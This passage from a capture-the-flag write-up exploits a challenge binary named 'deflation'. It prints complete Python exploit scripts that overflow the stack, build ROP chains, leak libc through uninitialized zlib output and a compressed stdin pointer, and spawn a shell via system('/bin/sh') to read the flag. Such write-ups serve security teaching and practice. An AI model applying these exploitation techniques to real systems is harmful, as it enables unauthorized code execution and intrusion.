        004011dd 4c 8d 25        LEA        R12,[strm]
                 5c 2e 00 00
        004011e4 55              PUSH       RBP

strm is loaded in r12 as an absolute address, so if we want to create a fake structure we need to jump at 0x04011e4 with the register set to an area that is writeable. In this case I will use the bss right after strm itself which is empty, so dbg.elf.symbols["strm"] + 112, while as a buffer to compress I just will take the empty data in dbg.elf.symbols["strm"] + 112 * 2. If this executes we would be left with a copy of strm in the bss that we can then compress and receive by calling normally vuln(dbg.elf.symbols["strm"] + 112, 112).

...
pop_rdi = lambda rdi: p64(0x4012eb) + p64(rdi)
pop_rsi = lambda rsi: p64(0x4012e9) + p64(rsi) + p64(0xdeadbeef12345678)  # pop rsi; pop r15: ret
pop_r12 = lambda r12: p64(0x40128b) + p64(r12) + p64(0xdeadbeef12345678) # pop r12; pop r13; ret
payload_2 = b"A" * 264 + pop_rdi(dbg.elf.symbols["strm"] + 112 * 2) + pop_rsi(1) + pop_r12(dbg.elf.symbols["strm"] + 112) + p64(0x04011e4)
payload_2 += p64(dbg.elf.symbols["main"]) * (0x200 - len(payload_2) // 0x8)
dbg.p.send(payload_2)
done = dbg.until("main+57", wait=False, loop=True)
while not done.wait(timeout=0.5):
    dbg.p.send(b"A" * 0x100)
dbg.call("fflush", [0])
dbg.p.recv()
dbg.until("main") # Execute our ropchain and wait for the process to call main again
dbg.call("fflush", [0])
data = dbg.p.recv()
print(data)
full script
from gdb_plus import *

def unzip(data):
  with context.silent:
    p = process("./inflation")
    p.send(data)
    p.stdin.close()
    data = p.recv()
    p.close()
  return data

target = p64(0x0401096)[:-1]
data = bytes([i for i in range(256) if i not in target])
def shift(array, n):
  return array[n:] + array[:n]
payload = shift(data, 94) + target
payload = payload[-256:]

binary_name = "./deflation"
context.binary = binary_name
dbg = Debugger(context.binary)

# Setup second call to read
dbg.p.send(payload)
dbg.until("main+57")
dbg.call("fflush", [0])
dbg.p.recv()
pop_rdi = lambda rdi: p64(0x4012eb) + p64(rdi)
pop_rsi = lambda rsi: p64(0x4012e9) + p64(rsi) + p64(0xdeadbeef12345678)  # pop rsi; pop r15: ret
pop_r12 = lambda r12: p64(0x40128b) + p64(r12) + p64(0xdeadbeef12345678) # pop r12; pop r13; ret
payload_2 = b"A" * 264 + pop_rdi(dbg.elf.symbols["strm"] + 112 * 2) + pop_rsi(1) + pop_r12(dbg.elf.symbols["strm"] + 112) + p64(0x04011e4)
payload_2 += p64(dbg.elf.symbols["main"]) * (0x200 - len(payload_2) // 0x8)
dbg.p.send(payload_2)
done = dbg.until("main+57", wait=False, loop=True)
while not done.wait(timeout=0.5):
    dbg.p.send(b"A" * 0x100)
dbg.call("fflush", [0])
dbg.p.recv()
dbg.until("main")
dbg.call("fflush", [0])
data = dbg.p.recv()
print(data)

This approach makes absolutely no sense though since we are skipping the part that sets the arguments for deflateInit2, therefore our fake structure will never get populated and we will have nothing to leak. Or more likely the function will just crash.

Surprisingly though, while trying to show the exact moment where the program would crash, I noticed that it just wouldn’t. Not only the function doesn’t crash, but when deflate is called the data we receive seem to be the uninitialize stack of a function, and inside we do have addresses that seem to come from the libc… If I try to explain it I would guess that since the object is not initialized deflate didn’t do anything, but we end up still copying what we thing is the output and instead is uninitialized data. In this case containing random libc addresses.

b'k\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00h\r\x00\x00\x00\x00\x00\x00\xa0\xc8\xe6\xa9"\x7f\x00\x00@\xa7\xca\xa9"\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\t\xe7\xd2\xa9"\x7f\x00\x00\xa0\xc6\xe6\xa9"\x7f\x00\x00\x02\x04\xd3\xa9"\x7f\x00\x00AAAA\x00\x00\x00\x00AAAAAAAAp\xec\xd2\xa9"\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00AAA'

In [3]: unzip(data)
Out[3]: b'inflate failed\n'

In [4]: for i in range(0, len(data), 8):
   ...:     print(hex(u64(data[i:i+8])))
0x6b
0x1
0xd68
0x7f22a9e6c8a0
0x7f22a9caa740
0x0
0x7f22a9d2e709
0x7f22a9e6c6a0
0x7f22a9d30402
0x41414141
0x4141414141414141
0x7f22a9d2ec70
0x0

Let’s make sure that the address is consistent between runs and on the remote server.

...
for i in range(5):
  ...
  pop_rdi = lambda rdi: p64(0x4012eb) + p64(rdi)
  pop_rsi = lambda rsi: p64(0x4012e9) + p64(rsi) + p64(0xdeadbeef12345678)  # pop rsi; pop r15: ret
  pop_r12 = lambda r12: p64(0x40128b) + p64(r12) + p64(0xdeadbeef12345678) # pop r12; pop r13; ret
  payload_2 = b"A" * 264 + pop_rdi(dbg.elf.symbols["strm"] + 112 * 2) + pop_rsi(1) + pop_r12(dbg.elf.symbols["strm"] + 112) + p64(0x04011e4)
  payload_2 += p64(dbg.elf.symbols["main"]) * (0x200 - len(payload_2) // 0x8)
  dbg.p.send(payload_2)
  done = dbg.until("main+57", wait=False, loop=True)
  while not done.wait(timeout=0.5):
      dbg.p.send(b"A" * 0x100)
  dbg.call("fflush", [0])
  dbg.p.recv()
  dbg.until("main") # Execute our ropchain and wait for the process to call main again
  dbg.call("fflush", [0])
  data = dbg.p.recv()
  log.info(hex(u64(data[11*8:12*8]) - dbg.libc.address))
full script
from gdb_plus import *

def unzip(data):
  with context.silent:
    p = process("./inflation")
    p.send(data)
    p.stdin.close()
    data = p.recv()
    p.close()
  return data

target = p64(0x0401096)[:-1]
data = bytes([i for i in range(256) if i not in target])
def shift(array, n):
  return array[n:] + array[:n]
payload = shift(data, 94) + target
payload = payload[-256:]

binary_name = "./deflation"
context.binary = binary_name

for i in range(5):
  with Debugger(context.binary) as dbg:

    # Setup second call to read
    dbg.p.send(payload)
    dbg.until("main+57")
    dbg.call("fflush", [0])
    dbg.p.recv()
    pop_rdi = lambda rdi: p64(0x4012eb) + p64(rdi)
    pop_rsi = lambda rsi: p64(0x4012e9) + p64(rsi) + p64(0xdeadbeef12345678)  # pop rsi; pop r15: ret
    pop_r12 = lambda r12: p64(0x40128b) + p64(r12) + p64(0xdeadbeef12345678) # pop r12; pop r13; ret
    payload_2 = b"A" * 264 + pop_rdi(dbg.elf.symbols["strm"] + 112 * 2) + pop_rsi(1) + pop_r12(dbg.elf.symbols["strm"] + 112) + p64(0x04011e4)
    payload_2 += p64(dbg.elf.symbols["main"]) * (0x200 - len(payload_2) // 0x8)
    dbg.p.send(payload_2)
    done = dbg.until("main+57", wait=False, loop=True)
    while not done.wait(timeout=0.5):
        dbg.p.send(b"A" * 0x100)
    dbg.call("fflush", [0])
    dbg.p.recv()
    dbg.until("main")
    dbg.call("fflush", [0])
    data = dbg.p.recv()
    log.info(hex(u64(data[11*8:12*8]) - dbg.libc.address))

Indeed the offset is always the same… So we do have a leak of the libc that doesn’t crash the program…

[*] 0x81c70
[*] 0x81c70
[*] 0x81c70
[*] 0x81c70
[*] 0x81c70

Well, nice to have such ideas only after solving the challenge…

Now I’m curious about why it happens though.

...
dbg.until("vuln+0x55")
print(f"calling deflateInit2_({', '.join(map(hex, [dbg.args[i] for i in range(8)]))})")

print("fake struct before:")
print(dbg.execute("x/14gx 0x4040b0"))

dbg.ni()
print("fake struct after:")
print(dbg.execute("x/14gx 0x4040b0"))
print(f"return value deflateInit2_: {hex(dbg.rax)}")

dbg.until("deflate")
print(f"calling deflate({', '.join(map(hex, [dbg.args[i] for i in range(2)]))})")
dbg.finish()
print(f"return value deflate: {hex(dbg.rax)}")

dbg.until("vuln+0x97")
print(f"calling memcpy({', '.join(map(hex, [dbg.args[i] for i in range(3)]))})")
full script
from gdb_plus import *

def unzip(data):
  with context.silent:
    p = process("./inflation")
    p.send(data)
    p.stdin.close()
    data = p.recv()
    p.close()
  return data

target = p64(0x0401096)[:-1]
data = bytes([i for i in range(256) if i not in target])
def shift(array, n):
  return array[n:] + array[:n]
payload = shift(data, 94) + target
payload = payload[-256:]

binary_name = "./deflation"
context.binary = binary_name
dbg = Debugger(context.binary)

# Setup second call to read
dbg.p.send(payload)
dbg.until("main+57")
dbg.call("fflush", [0])
dbg.p.recv()
pop_rdi = lambda rdi: p64(0x4012eb) + p64(rdi)
pop_rsi = lambda rsi: p64(0x4012e9) + p64(rsi) + p64(0xdeadbeef12345678)  # pop rsi; pop r15: ret
pop_r12 = lambda r12: p64(0x40128b) + p64(r12) + p64(0xdeadbeef12345678) # pop r12; pop r13; ret
payload_2 = b"A" * 264 + pop_rdi(dbg.elf.symbols["strm"] + 112 * 2) + pop_rsi(1) + pop_r12(dbg.elf.symbols["strm"] + 112) + p64(0x04011e4)
payload_2 += p64(dbg.elf.symbols["main"]) * (0x200 - len(payload_2) // 0x8)
dbg.p.send(payload_2)
done = dbg.until("main+57", wait=False, loop=True)
while not done.wait(timeout=0.5):
    dbg.p.send(b"A" * 0x100)
dbg.call("fflush", [0])
dbg.p.recv()

dbg.until("vuln+0x55")
print(f"calling deflateInit2_({', '.join(map(hex, [dbg.args[i] for i in range(8)]))})")

print("fake struct before:")
print(dbg.execute("x/14gx 0x4040b0"))

dbg.ni()
print("fake struct after:")
print(dbg.execute("x/14gx 0x4040b0"))
print(f"return value deflateInit2_: {hex(dbg.rax)}")

dbg.until("deflate")
print(f"calling deflate({', '.join(map(hex, [dbg.args[i] for i in range(2)]))})")
dbg.finish()
print(f"return value deflate: {hex(dbg.rax)}")

dbg.until("vuln+0x97")
print(f"calling memcpy({', '.join(map(hex, [dbg.args[i] for i in range(3)]))})")
calling deflateInit2_(0x4040b0, 0xffffffff, 0x8, 0xc00, 0x6a, 0x0, 0x0, 0x0)
fake struct before deflateInit2_:
0x4040b0:	0x0000000000000000	0x0000000000000000
0x4040c0:	0x0000000000000000	0x0000000000000000
0x4040d0:	0x0000000000000000	0x0000000000000000
0x4040e0:	0x0000000000000000	0x0000000000000000
0x4040f0:	0x0000000000000000	0x0000000000000000
0x404100:	0x0000000000000000	0x0000000000000000
0x404110:	0x0000000000000000	0x0000000000000000

fake struct after deflateInit2_:
0x4040b0:	0x0000000000000000	0x0000000000000000
0x4040c0:	0x0000000000000000	0x0000000000000000
0x4040d0:	0x0000000000000000	0x0000000000000000
0x4040e0:	0x0000000000000000	0x0000000000000000
0x4040f0:	0x0000000000000000	0x0000000000000000
0x404100:	0x0000000000000000	0x0000000000000000
0x404110:	0x0000000000000000	0x0000000000000000

return value deflateInit2_: 0xfffffffa
calling deflate(0x4040b0, 0x4)
return value deflate: 0xfffffffe
calling memcpy(0x404120, 0x7ffe16827468, 0x6a)

Okay, deflateInit2_ and deflate do return errors, but the program is not checking for them. It trusts deflate to fill-in the buffer, and then blindly prints its content back to us even though in this case it is still uninitialized.

It is nice to have found this unintended solution, but how were we supposed to leak the libc legitimately ?

Intended solution

While looking at the addresses in the bss there is one thing that sticks out. We know about three structures saved there: stdin, stdout and strm. But the first one, stdin, is saved at 0x404020, while our page starts at 0x404000. The first 32 bytes are all null, so is there a chance that if we call vuln(0x404000, 40) to include stdin the compressed buffer would fit in the unused 32 bytes since so many bytes are repeated ?

...
pop_rdi = lambda rdi: p64(0x4012eb) + p64(rdi)
pop_rsi = lambda rsi: p64(0x4012e9) + p64(rsi) + p64(0xdeadbeef12345678)  # pop rsi; pop r15: ret
payload_2 = b"A" * 264 + pop_rdi(0x404000) + pop_rsi(40) + p64(dbg.elf.symbols["vuln"])
payload_2 += p64(dbg.elf.symbols["main"]) * (0x200 - len(payload_2) // 0x8)
dbg.p.send(payload_2)
done = dbg.until("main+57", wait=False, loop=True)
while not done.wait(timeout=0.5):
    dbg.p.send(b"A" * 0x100)
dbg.call("fflush", [0])
dbg.p.recv()
dbg.until("main") # Execute our ropchain and wait for the process to call main again
dbg.call("fflush", [0])
dbg.p.recv()
dbg.until("memcpy")
print(f"compressed length: {dbg.args[2]}/32")
full script
from gdb_plus import *

def unzip(data):
  with context.silent:
    p = process("./inflation")
    p.send(data)
    p.stdin.close()
    data = p.recv()
    p.close()
  return data

target = p64(0x0401096)[:-1]
data = bytes([i for i in range(256) if i not in target])
def shift(array, n):
  return array[n:] + array[:n]
payload = shift(data, 94) + target
payload = payload[-256:]

binary_name = "./deflation"
context.binary = binary_name
dbg = Debugger(context.binary)

# Setup second call to read
dbg.p.send(payload)
dbg.until("main+57")
dbg.call("fflush", [0])
dbg.p.recv()
pop_rdi = lambda rdi: p64(0x4012eb) + p64(rdi)
pop_rsi = lambda rsi: p64(0x4012e9) + p64(rsi) + p64(0xdeadbeef12345678)  # pop rsi; pop r15: ret
payload_2 = b"A" * 264 + pop_rdi(0x404000) + pop_rsi(40) + p64(dbg.elf.symbols["vuln"])
payload_2 += p64(dbg.elf.symbols["main"]) * (0x200 - len(payload_2) // 0x8)
dbg.p.send(payload_2)
done = dbg.until("main+57", wait=False, loop=True)
while not done.wait(timeout=0.5):
    dbg.p.send(b"A" * 0x100)
dbg.call("fflush", [0])
dbg.p.recv()
dbg.until("memcpy")
print(f"compressed length: {dbg.args[2]}/32")
dbg.until("main")
dbg.call("fflush", [0])
data = dbg.p.recv()
print(data)
print(hex(unpack(unzip(data)[-8:])))

Indeed the compressed data does fit in those unused 32 bytes! We can therefore leak stdin by calling vuln without any risk of corrupting it.

compressed length: 32/32
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa06\xb9\n\xb9{\x00\x00'
0x7bb90ab936a0

Final exploit

Now that we have the libc we can easily build our payload to call system("/bin/sh", 0x0, 0x0). We can find in the libc both a gadget to set the third argument in rdx and the string "/bin/sh\x00".

One small problem I noticed though is that the input buffer is still a bit dirty when executing our exploit and if we just call system the program crashes. It required some attempts to find this but by calling main once to first empty the data buffered in stdin, and then calling /bin/sh twice, the second execution does give us a stable shell.

...
def call(address, args):
    pop_rdi = lambda rdi: [0x4012eb, rdi]
    pop_rsi = lambda rsi: [0x4012e9, rsi, 0] # pop rsi, pop r15
    pop_rdx = lambda rdx: [dbg.libc.address + 0xcb1cd, 0]
    payload = []
    if len(args) >= 1:
        payload += pop_rdi(args[0])
    if len(args) >= 2:
        payload += pop_rsi(args[1])
    if len(args) == 3:
        payload += pop_rdx(args[2])
    payload += [address]
    return b"".join(map(p64, payload))

ropchain = call(dbg.exe.symbols["main"], [])
ropchain += call(dbg.libc.symbols["puts"], [next(dbg.libc.search(b"/bin/sh\x00"))])
ropchain += call(dbg.libc.symbols["system"], [next(dbg.libc.search(b"/bin/sh\x00")), 0, 0])
ropchain += call(dbg.libc.symbols["system"], [next(dbg.libc.search(b"/bin/sh\x00")), 0, 0])
ropchain += call(dbg.libc.symbols["system"], [next(dbg.libc.search(b"/bin/sh\x00")), 0, 0])
payload_3 = p64(dbg.elf.symbols["main"]) * (264 // 8) + ropchain
payload_3 += p64(dbg.elf.symbols["main"]) * (0x200 - len(payload_3) // 8)
dbg.p.send(payload_3)

dbg.until("fread")
done = dbg.finish(wait=False)
while not done.wait(timeout=0.5):
    dbg.p.send(b"A" * 0x100)
dbg.until("main+57")
dbg.p.recv()
dbg.c(wait=False)

dbg.p.interactive()
Full exploit
from gdb_plus import *

# args.REMOTE = True
HOST = "127.0.0.1"
PORT = 4000
binary_name = "./deflation"
context.binary = binary_name

def unzip(data):
    with context.silent:
        p = process("./inflation")
        # print("sending", data)
        p.send(data)
        p.stdin.close()
        data = p.recv()
        p.close()
    # print(data)
    return data

dbg = Debugger(context.binary).remote(HOST, PORT)

def flush(debugger):
    debugger.finish()
    debugger.call("fflush", [0])
    return False
dbg.b("fwrite", callback=flush) # Make sure to flush after each write

def shift(array, n):
    return array[n:] + array[:n]

target = p64(0x0401096)[:-1]
data = bytes([i for i in range(256) if i not in target])
payload_1 = shift(data, 94) + target
payload_1 = payload_1[-256:]

def call(address, args):
    pop_rdi = lambda value: [0x4012eb, value]
    pop_rsi = lambda value: [0x4012e9, value, 0] # pop rsi, pop r15
    payload = pop_rdi(args[0])
    if len(args) == 2:
        payload += pop_rsi(args[1])
    payload += [address]
    return b"".join(map(p64, payload))


# Copy the got entry in the bss. Use the first address after strm.
ropchain = call(dbg.exe.symbols["vuln"], [0x404000, 40])
payload_2 = p64(dbg.elf.symbols["main"]) * (264 // 8) + ropchain
payload_2 += p64(dbg.elf.symbols["main"]) * (0x200 - len(payload_2) // 8)

dbg.until("fread")
dbg.p.send(payload_1)
dbg.until("fread", loop=True)
dbg.p.recvn(279)
dbg.p.send(payload_2)

if not dbg.debugging:
    while (data := dbg.p.recv(timeout=0.5)) == b"":
        dbg.p.send(p64(dbg.elf.symbols["main"]) * 0x20)
    sleep(1)
else:
    done = dbg.until("main+57", wait=False)
    while not done.wait(timeout=0.5):
        dbg.p.send(p64(dbg.elf.symbols["main"]) * 0x20)
    dbg.p.recv()
    dbg.until("fread")


leak = unzip(dbg.p.recvn(32))
leak_libc = u64(leak[-8:])
dbg.libc.address = leak_libc - (dbg.libc.symbols["_IO_2_1_stdout_"] - dbg.libc.address)
log.success(f"base libc: {hex(dbg.libc.address)}")

dbg.until("fread", loop=True) # We are sure to have at least one more block
while dbg.p.recv(timeout=0.5) != b"":
    done = dbg.until("main+57", wait=False, loop=True)
    done.wait(timeout=3)

dbg.p.send(b"A" * 256)
done.wait()
data = dbg.p.recv()
assert unzip(data[-24:]) == b"A" * 256

dbg.p.send(payload_1)
dbg.until("main+57", loop=True)
dbg.p.recvn(279)

# Now that we have the libc we can just use it to set rdx
def call(address, args):
    pop_rdi = lambda rdi: [0x4012eb, rdi]
    pop_rsi = lambda rsi: [0x4012e9, rsi, 0] # pop rsi, pop r15
    pop_rdx = lambda rdx: [dbg.libc.address + 0xcb1cd, 0]
    payload = []
    if len(args) >= 1:
        payload += pop_rdi(args[0])
    if len(args) >= 2:
        payload += pop_rsi(args[1])
    if len(args) == 3:
        payload += pop_rdx(args[2])
    payload += [address]
    return b"".join(map(p64, payload))

ropchain = call(dbg.exe.symbols["main"], [])
ropchain += call(dbg.libc.symbols["puts"], [next(dbg.libc.search(b"/bin/sh\x00"))])
ropchain += call(dbg.libc.symbols["system"], [next(dbg.libc.search(b"/bin/sh\x00")), 0, 0])
ropchain += call(dbg.libc.symbols["system"], [next(dbg.libc.search(b"/bin/sh\x00")), 0, 0])
ropchain += call(dbg.libc.symbols["system"], [next(dbg.libc.search(b"/bin/sh\x00")), 0, 0])
payload_3 = p64(dbg.elf.symbols["main"]) * (264 // 8) + ropchain
payload_3 += p64(dbg.elf.symbols["main"]) * (0x200 - len(payload_3) // 8)
dbg.p.send(payload_3)

if not dbg.debugging:
    while (data := dbg.p.recv(timeout=0.5)) == b"":
        dbg.p.send(b"A" * 0x100)
    sleep(1)
else:
    dbg.until("fread")
    done = dbg.finish(wait=False)
    while not done.wait(timeout=0.5):
        dbg.p.send(b"A" * 0x100)
dbg.until("main+57")
dbg.p.recv()
dbg.c(wait=False)

dbg.sendline(b"cat flag.txt")
flag = dbg.recvline().decode()
log.success(f"FLAG: {flag}")
dbg.close()

Conclusion

This was a really cute challenge for the number of options on how to solve it. In particular it reminded me the importance to still test desperate options that seem unlikely and think properly about what we have in front of us.

Here we focussed on what I think was the solution which justifies the most the difficulty rating, but if you want to try it there is also the possibility to exploit the challenge without relying on vuln after we have the simple buffer overflow. Have fun with it.

small hint

Remember what was our problem. We only found how to set the first two arguments of a function, but is there something we missed?

big spoiler

https://ypl.coffee/ret2csu/